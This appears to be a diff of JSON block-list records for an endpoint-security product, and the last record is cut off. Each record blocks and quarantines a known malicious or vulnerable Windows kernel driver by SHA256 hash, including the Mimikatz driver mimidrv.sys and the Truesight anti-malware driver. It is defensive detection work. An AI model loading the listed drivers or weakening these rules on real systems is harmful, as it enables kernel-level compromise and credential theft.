+ "id": "72ad6b69-1af0-567f-bd00-94c10f8bf768",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.463558Z",
+ "creation_date": "2026-03-23T11:45:30.463561Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.463569Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "94c71954ac0b1fd9fa2bd5c506a16302100ba75d9f84f39ee9b333546c714601",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "72afebbf-9154-5489-866e-948e51ca34cd",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.611044Z",
+ "creation_date": "2026-03-23T11:45:29.611046Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.611052Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6045d564286f00fc1efedd25ffd22ecb7eaf2b3a6c778e392319380c77e45658",
+ "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "72b8909f-768c-5a1a-a321-edbd592898d2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.145182Z",
+ "creation_date": "2026-03-23T11:45:31.145184Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.145190Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bce6677edd89a2cb72b1c81629be195a6d53efda931d4de08cb3c3feda90cda8",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "72c1cca8-fb1d-5567-aac7-057b3b5797fc",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.469427Z",
+ "creation_date": "2026-03-23T11:45:30.469430Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.469439Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c24d0fa3ec5fae870fb0a4e38943d396929d78165354bae56ae5730eb4d062e1",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "72c90592-7188-5fc0-8727-bbcf438d87c2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.145488Z",
+ "creation_date": "2026-03-23T11:45:32.145491Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.145496Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "628c559f9f5de53cad74bc1f0c489bbe1aa5ef5672f47f73c0bfff1fcf98faca",
+ "comment": "Malicious Kernel Driver (aka driver_4fc254af.sys) [https://www.loldrivers.io/drivers/85335187-dae0-4f06-acea-209efaf74973/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "72de97b8-155e-51fe-84c3-d493fb200f4f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.605430Z",
+ "creation_date": "2026-03-23T11:45:29.605432Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.605438Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "440883cd9d6a76db5e53517d0ec7fe13d5a50d2f6a7f91ecfc863bc3490e4f5c",
+ "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "72e67650-995a-5488-b184-cad2a82ff6c3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.480227Z",
+ "creation_date": "2026-03-23T11:45:30.480229Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.480234Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ae73dd357e5950face9c956570088f334d18464cd49f00c56420e3d6ff47e8dc",
+ "comment": "Vulnerable Kernel Driver (aka GEDevDrvSYS.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "72f131e6-fc37-5b83-9b2b-3cb5a3a479d6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 
10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.826710Z", + "creation_date": "2026-03-23T11:45:30.826712Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.826718Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7be4d4fe36fc8d9cb95f9b5a9cacc6387c1cb3e7f3e0774cd1713adbe25585fc", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "72fb555d-f5dd-5a3c-8401-f19285b80606", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.967856Z", + "creation_date": "2026-03-23T11:45:29.967859Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.967866Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, 
+ "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ff284e41b303db67aefcf22328b53712a80552741bdf2707cdc53c4a56db61aa", + "comment": "Retliften malicious signed drivers (aka netfilter.sys) [https://msrc-blog.microsoft.com/2021/06/25/investigating-and-mitigating-malicious-drivers/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "72fd2e96-a93e-5e91-a732-63f1a02402ad", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.489777Z", + "creation_date": "2026-03-23T11:45:31.489780Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.489788Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1153d489159dbfc0f73b382b5fe7a65decb407c5bd660a1d75bacbb0bf480cf0", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "730bbf03-ae27-5262-b332-9ec122cf6409", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": 
"af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.821583Z", + "creation_date": "2026-03-23T11:45:31.821585Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.821591Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ee3524f84250982770fe9c8b87a03e52559ae6bf0267977b23331c1cd944912f", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "731d47d9-a017-5c36-8c12-4343ae84b791", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.459215Z", + "creation_date": "2026-03-23T11:45:30.459218Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.459227Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5c54a5cd3386ac14725a07962562e9fdcefbb7be0d19803f9d71de24573de1e3", + "comment": 
"Vulnerable Kernel Driver (aka netfilter2.sys) [https://www.loldrivers.io/drivers/5ad8a3b6-6d20-4c95-8fa7-9a507167ba3c/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7328f342-5d06-5eaf-b068-ce74ec11b350", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.604986Z", + "creation_date": "2026-03-23T11:45:29.604988Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.604994Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "48e385449293884fd8b960a5aafd638fd67b86a4e344ab8aa8b330c333e2f6de", + "comment": "Process Hacker driver (aka kprocesshacker.sys) [https://processhacker.sourceforge.io/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7331b3ad-2d92-52a9-b0de-2923f9512335", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.466777Z", + "creation_date": "2026-03-23T11:45:30.466780Z", + "enabled": true, + 
"block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.466790Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "41ad660820c41fc8b1860b13dc1fea8bc8cb2faceb36ed3e29d40d28079d2b1f", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "733d2009-8fc2-5f88-9a2c-6a9bcadd11aa", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.146923Z", + "creation_date": "2026-03-23T11:45:32.146927Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.146935Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b2ff9ef50ae037bb003d7157ea8da008a48f715a78c644b5f027b070bf5eb049", + "comment": "Vulnerable Kernel Driver (aka CSAgent.sys) [https://www.loldrivers.io/drivers/ca6455d1-b06e-496c-be33-f89c41b27540/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "73484597-63ac-5e39-8904-5c2d5ce45e55", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", 
+ "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.493347Z", + "creation_date": "2026-03-23T11:45:31.493349Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.493354Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "bfcc07c38577184a196241d9ec950a897283e9035f5691fd98ef0b8a4217fc95", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "73493972-6467-5cd4-9ac3-b97ab76eb082", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.606121Z", + "creation_date": "2026-03-23T11:45:29.606123Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.606128Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, 
+ "references": [], + "type": "hash", + "value": "6bfc0f425de9f4e7480aa2d1f2e08892d0553ed0df1c31e9bf3d8d702f38fa2e", + "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "734d7179-7067-54c2-b2f0-c9dd85c4cc10", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.156483Z", + "creation_date": "2026-03-23T11:45:31.156485Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.156491Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a54fd22d8f78a8ba931972bf703eda24671c6d892c1fb979c8902ee27202a120", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "734e34d7-746e-5d75-9128-8cf79408d400", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": 
false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.486230Z", + "creation_date": "2026-03-23T11:45:31.486234Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.486244Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "54c6aaa465b70002a698d098850be2dc8fc24cc91dc8c60fc93f809b1ff34e8d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7360fccd-6978-5146-8d22-e6350ddc6209", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.453313Z", + "creation_date": "2026-03-23T11:45:30.453316Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.453325Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3140005ce5cac03985f71c29732859c88017df9d41c3761aa7c57bbcb7ad2928", + "comment": "Vulnerable Kernel Driver (aka nicm.sys) 
[https://www.loldrivers.io/drivers/86cff0de-2536-4b8d-a846-a7312c569597/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "73720332-876e-5d5a-9788-80e5c2797fb1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.490506Z", + "creation_date": "2026-03-23T11:45:31.490508Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.490513Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1d5b5e581f7148fabe40f58754b08c9ecf1d0a7d463243c97ec69dea86bf29a6", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "73743ef2-68f4-5751-8099-b0043b53bd69", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.980498Z", + "creation_date": 
"2026-03-23T11:45:29.980500Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.980506Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "30d737a6da29ad2fe035c0a5f1f7a423a8cd96b8f3dc9885fe95ef3333478dd7", + "comment": "Vulnerable Kernel Driver (aka rzpnk.sys) [https://www.loldrivers.io/drivers/1c6e1d3b-f825-4065-9e0c-83386883e40f/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "737af276-81ed-5d37-aa7a-aa470290a730", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.498550Z", + "creation_date": "2026-03-23T11:45:31.498553Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.498561Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "89ef99feca2c7e781e1a8986cb8367c4a46a90f9a4640e7b29756ff05851ec43", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "73820eaf-499d-5319-b3d7-63f67d6d2ac6", + 
"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.606647Z", + "creation_date": "2026-03-23T11:45:29.606651Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.606657Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1c70f2a3b20ba75fd8d14daab331dfbf341c455cd6bcc1969092ec4559261bcf", + "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "73883859-5576-5d8b-b231-250f9a6cf956", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + 